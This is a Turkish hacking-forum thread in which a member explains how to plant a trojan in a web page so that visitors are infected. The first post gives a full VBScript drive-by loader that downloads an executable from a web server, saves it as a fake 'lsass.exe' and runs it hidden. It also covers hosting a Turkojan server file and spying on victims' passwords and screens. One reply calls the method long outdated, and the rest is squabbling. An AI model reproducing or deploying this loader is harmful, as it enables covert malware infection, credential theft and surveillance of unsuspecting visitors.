İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Web Siteye Trojan Yerleştirme

05-03-2016 19:38
#1
Üyelik tarihi:
02/2015
Nereden:
Siverek
Yaş:
23
Mesajlar:
694
Teşekkür (Etti):
158
Teşekkür (Aldı):
90
Konular:
210
Ticaret:
(0) %
Merhaba arkadaşlar sizlere web sayfasına trojan gömmeyi anlatıcam.
Bu gördüğünüz kod sayesinde Yolu belirtilen serverımız siteye girilen kişinin bilgisayarı tarafından otomatik açılır.

Bu yöntem oldukça geçerlidir.Çünkü artık kimse msnde babasndan bile dosya almıyor.Ama sitede trojan olduğu çoğu kişinin hesabına gelmez.

Şimdi açıklamamı yapayım.

Serverınızın linki

Şimdi böyle bir kısım var.

Server nedir , Linkini nasıl alıcaz...

Server dediğimiz şey trojanlarda kendi bilgilerimizi ayarlayıp oluşturduğumuz dosyadır.Trojandan trojana özellikler değişir.Ama genelde mantık aynıdır.Karşı taraf exe yi açtığı zaman Bilgisayarında port açılır yani otomatik bi açık bırakılır.Ve bu sayede dosyayı yedirdiğimiz kişinin Ekranını bile izleyebiliriz.

Ben trojan olarak Turkojanı kullanıyorum.


Şimdi serverımızı oluşturduk diyelim Link nasıl alıcaz.
İlk önce bi web siteniz olması gerekiyor.Ücretsizde olabilir.

Örneğin Emre.com diye sitem olsun benim.

Ftp den bağlanıp benim server.exe mi anadizine atıyorum.

Ve link şöyle oluyor http://www.sanlarenzo.com/server.exe
Buraya yüklendikten sonra internet explorerdan bu linki açıp kontrol ediyoruz.Bunu açtığınızda Çalıştır - Kaydet - İptal çıkar.Eğer çıkarsa olmuştur.Çıkmazsa sitenizin sunucusu güvenlik tarafından serverdaki exe uzantılarının çalıştırılmasını engellemiştir.Eğer öyleyse çalışmaz.
Yani serverınızı attığnız zaman mutlaka linke girdiğiniz zaman Çalıştır-Kaydet-İptal dalgası çıkması lazım.

Evet yapılacaklar bu kadar.

Özet olarak ; Servermızı oluşturduk ... server.exe
Sitemize upload ettik http://www.sanlarenzo.com/server.exe oldu
Bu verdiğim kodları alın.Not defterine atın.
Kodun Serverınızın linki Kısmına "http://www.siteisminiz.com/server.exe"
yazın.Daha sonra farkı kaydet deyip.
.html uzantılı kaydedin.Mesela sanlrenzo.html diye kaydettim.
o zmn http://www.sanlrenzo.com/sanlarenzo.html olur
Bu linki karşı tarafa attığım zaman.Kodlar sayesinde otomatik olarak ana dizindeki server.exe çalışacaktır.Ve Kurbanımız trojanı yemiş olacaktır.
Sonra şifreler, SS'ler, uzak masaüstü trojanınızın özelliğine göre kafanıza göre takılın.
PHP Kod:
Kod:
<script language="VBScript">
on error resume next
Set obj1 = ********.createElement("object")
obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
est1="Microsoft."&"_xmlHTTP"A
Set obj2 = obj1.CreateObject(est1,"")

est="Ado"&"db."&"Str"&"eam"
set obj3 = obj1.createobject(est,"")
obj3.type = 1
est2="GET"
obj2.Open est2, "Serverınızın linki", False
obj2.Send

set F = obj1.createobject("Scripting.FileSystemObject","")
set pasta = F.GetSpecialFolder(2)
fi="lsass.exe"
fi= F.BuildPath(pasta,fi)

obj3.open
obj3.write obj2.responseBody 
obj3.savetofile fi,2
obj3.close

set obj5 = obj1.createobject("Shell.Application","")

obj5.ShellExecute fi,"","","open",0
</script>
Kullanıcı İmzası
بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
OSMANLI İMPARATORLUĞU ( 1299 - ∞ )
TurkHackTeam
Faceleser Teşekkür etti.

05-03-2016 19:50
#2
zztri - ait Kullanıcı Resmi (Avatar)
Geliştirici
Üyelik tarihi:
07/2015
Nereden:
Ankara
Mesajlar:
9.356
Teşekkür (Etti):
1766
Teşekkür (Aldı):
3959
Konular:
68
Ticaret:
(0) %
20 sene önce filan işe yarıyordu üstad...

Lütfen böyle şeyleri önce en az 1 kez deneyin, sonra paylaşın.
Kullanıcı İmzası
Gayrıresmi Trolleme Kulübü Kurucu Üyesi...

Sii Şarp: 430%
Site yapmah: 386%
Piieyçpii: 396.8%
Cava: 205%
Andıroyid: 37.9²%
Nodjiies: 196%
Sii artı artı: 342.333333334%
Yuniti: 154%
Paytın 304%
Bat dosyasıyla hedef çökertme: 96i+382√17%
05-03-2016 19:52
#3
Üyelik tarihi:
02/2015
Nereden:
Siverek
Yaş:
23
Mesajlar:
694
Teşekkür (Etti):
158
Teşekkür (Aldı):
90
Konular:
210
Ticaret:
(0) %
Alıntı:
zztri´isimli üyeden Alıntı Mesajı göster
20 sene önce filan işe yarıyordu üstad...

Lütfen böyle şeyleri önce en az 1 kez deneyin, sonra paylaşın.
Güzel kardeşim sende herşeye laf atıyorsun hangı konuya baksam eğer orda yorum atmışsan her zaman milleti tersliyorsun sözlerin iğneliyici
Kullanıcı İmzası
بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِارَّحِيم
OSMANLI İMPARATORLUĞU ( 1299 - ∞ )
TurkHackTeam
05-03-2016 21:16
#4
zztri - ait Kullanıcı Resmi (Avatar)
Geliştirici
Üyelik tarihi:
07/2015
Nereden:
Ankara
Mesajlar:
9.356
Teşekkür (Etti):
1766
Teşekkür (Aldı):
3959
Konular:
68
Ticaret:
(0) %
Alıntı:
san larenzo´isimli üyeden Alıntı Mesajı göster
Güzel kardeşim sende herşeye laf atıyorsun hangı konuya baksam eğer orda yorum atmışsan her zaman milleti tersliyorsun sözlerin iğneliyici
Eee?

Bildiğim her şeye laf atarım. Hata yaparsam kabul ederim. Hata yapmamışsam trollerim. Bununla bir derdin var mı?

Edit: Dur asıl mesajı atan kişiymişsin farketmemişim..

O zaman soruyorum; bir kere bile olsa denedin mi?
Kullanıcı İmzası
Gayrıresmi Trolleme Kulübü Kurucu Üyesi...

Sii Şarp: 430%
Site yapmah: 386%
Piieyçpii: 396.8%
Cava: 205%
Andıroyid: 37.9²%
Nodjiies: 196%
Sii artı artı: 342.333333334%
Yuniti: 154%
Paytın 304%
Bat dosyasıyla hedef çökertme: 96i+382√17%
CentDoS7 Teşekkür etti.
05-03-2016 21:19
#5
Lapricon - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2016
Nereden:
Medine
Mesajlar:
1.592
Teşekkür (Etti):
264
Teşekkür (Aldı):
458
Konular:
179
Ticaret:
(0) %
Alıntı:
san larenzo´isimli üyeden Alıntı Mesajı göster
Güzel kardeşim sende herşeye laf atıyorsun hangı konuya baksam eğer orda yorum atmışsan her zaman milleti tersliyorsun sözlerin iğneliyici
Sen soyleyince baktim profiline 1 tane faydali konusu yok
Kimse kimseyi tersliyemez forumda ve kimse babasinin usagi degil eger hakaret turu birsey olursa UDY ye bildirin gerekeni yaparlar !
Kullanıcı İmzası
Kişisel neyimiz olduki imzamız olsun
05-03-2016 21:55
#6
camgezer - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Mesajlar:
20
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
eline sağlık yararlı

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı